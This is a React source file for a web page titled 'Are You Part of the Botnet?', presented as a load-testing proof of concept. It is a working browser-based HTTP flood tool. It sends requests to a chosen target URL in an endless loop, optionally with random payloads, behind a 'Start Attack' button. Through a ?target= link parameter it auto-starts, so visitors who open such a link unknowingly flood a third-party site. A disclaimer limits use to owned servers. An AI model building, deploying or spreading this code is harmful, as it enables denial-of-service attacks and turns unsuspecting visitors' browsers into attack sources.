import { useState, useEffect, useRef } from 'react';
import './App.css';

function App() {
  const [targetUrl, setTargetUrl] = useState('');
  const [method, setMethod] = useState('GET');
  const [bodySize, setBodySize] = useState(0);
  const [isRunning, setIsRunning] = useState(false);
  const [requestCount, setRequestCount] = useState(0);
  const [requestsPerSecond, setRequestsPerSecond] = useState(0);
  const [lastSecondCount, setLastSecondCount] = useState(0);
  const isRunningRef = useRef(false);
  const requestCountRef = useRef(0);
  const lastSecondRef = useRef(Date.now());

  // Check for target parameter in URL and auto-start
  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    const target = params.get('target');
    if (target) {
      setTargetUrl(target);
      // Auto-start after a brief delay
      setTimeout(() => {
        setIsRunning(true);
      }, 500);
    }
  }, []);

  // Update requests per second
  useEffect(() => {
    const interval = setInterval(() => {
      const now = Date.now();
      const elapsed = (now - lastSecondRef.current) / 1000;
      const newRequests = requestCountRef.current - lastSecondCount;
      const rps = elapsed > 0 ? newRequests / elapsed : 0;
      setRequestsPerSecond(rps);
      setLastSecondCount(requestCountRef.current);
      lastSecondRef.current = now;
    }, 1000);

    return () => clearInterval(interval);
  }, [lastSecondCount]);

  // Main request loop
  useEffect(() => {
    isRunningRef.current = isRunning;

    const makeRequests = async () => {
      while (isRunningRef.current) {
        try {
          const options = {
            method: method,
            mode: 'no-cors', // To avoid CORS issues
          };

          // Add random body if configured
          if (bodySize > 0 && method !== 'GET' && method !== 'HEAD') {
            const randomBytes = new Array(bodySize)
              .fill(0)
              .map(() => Math.floor(Math.random() * 256));
            const randomString = String.fromCharCode(...randomBytes);
            options.body = randomString;
          }

          await fetch(targetUrl, options);
          
          requestCountRef.current += 1;
          setRequestCount(requestCountRef.current);
        } catch (error) {
          // Continue on error
          requestCountRef.current += 1;
          setRequestCount(requestCountRef.current);
        }
      }
    };

    if (isRunning && targetUrl) {
      makeRequests();
    }
  }, [isRunning, targetUrl, method, bodySize]);

  const handleStart = () => {
    if (!targetUrl) {
      alert('Please enter a target URL');
      return;
    }
    setIsRunning(true);
  };

  const handleStop = () => {
    setIsRunning(false);
  };

  const handleReset = () => {
    setIsRunning(false);
    setRequestCount(0);
    setRequestsPerSecond(0);
    setLastSecondCount(0);
    requestCountRef.current = 0;
    lastSecondRef.current = Date.now();
  };

  // Color based on requests per second
  const getSpeedColor = (rps) => {
    if (rps < 10) return '#ff4444';
    if (rps < 50) return '#ffaa00';
    if (rps < 100) return '#ffff00';
    if (rps < 200) return '#88ff00';
    return '#00ff00';
  };

  return (
    <div className="App">
      <div className="container">
        <header className="header">
          <h1 className="title">🤖 Are You Part of the Botnet?</h1>
          <p className="subtitle">Proof of Concept - Network Load Testing</p>
        </header>

        <div className="config-section">
          <div className="form-group">
            <label htmlFor="targetUrl">Target URL</label>
            <input
              id="targetUrl"
              type="text"
              className="input"
              placeholder="https://example.com"
              value={targetUrl}
              onChange={(e) => setTargetUrl(e.target.value)}
              disabled={isRunning}
            />
          </div>

          <div className="form-row">
            <div className="form-group">
              <label htmlFor="method">HTTP Method</label>
              <select
                id="method"
                className="select"
                value={method}
                onChange={(e) => setMethod(e.target.value)}
                disabled={isRunning}
              >
                <option value="GET">GET</option>
                <option value="POST">POST</option>
                <option value="PUT">PUT</option>
                <option value="DELETE">DELETE</option>
                <option value="PATCH">PATCH</option>
                <option value="HEAD">HEAD</option>
              </select>
            </div>

            <div className="form-group">
              <label htmlFor="bodySize">Random Body Size (bytes)</label>
              <input
                id="bodySize"
                type="number"
                className="input"
                placeholder="0"
                value={bodySize}
                onChange={(e) => setBodySize(parseInt(e.target.value) || 0)}
                disabled={isRunning}
                min="0"
              />
            </div>
          </div>

          <div className="button-group">
            {!isRunning ? (
              <button className="button button-start" onClick={handleStart}>
                🚀 Start Attack
              </button>
            ) : (
              <button className="button button-stop" onClick={handleStop}>
                ⏸️ Stop
              </button>
            )}
            <button className="button button-reset" onClick={handleReset}>
              🔄 Reset
            </button>
          </div>
        </div>

        <div className="stats-section">
          <div className="stat-card">
            <div className="stat-label">Total Requests</div>
            <div className="stat-value">{requestCount.toLocaleString()}</div>
          </div>

          <div className="stat-card">
            <div className="stat-label">Requests/Second</div>
            <div 
              className="stat-value speed-indicator"
              style={{ color: getSpeedColor(requestsPerSecond) }}
            >
              {requestsPerSecond.toFixed(2)}
            </div>
          </div>

          <div className="stat-card">
            <div className="stat-label">Status</div>
            <div className={`stat-value ${isRunning ? 'status-running' : 'status-stopped'}`}>
              {isRunning ? '🔴 RUNNING' : '⚪ STOPPED'}
            </div>
          </div>
        </div>

        <div className="warning">
          ⚠️ <strong>Warning:</strong> This tool is for educational purposes only. 
          Only test against your own servers or with explicit permission.
        </div>

        <footer className="footer">
          <p>Auto-start by adding <code>?target=https://your-url.com</code> to the URL</p>
        </footer>
      </div>
    </div>
  );
}

export default App;
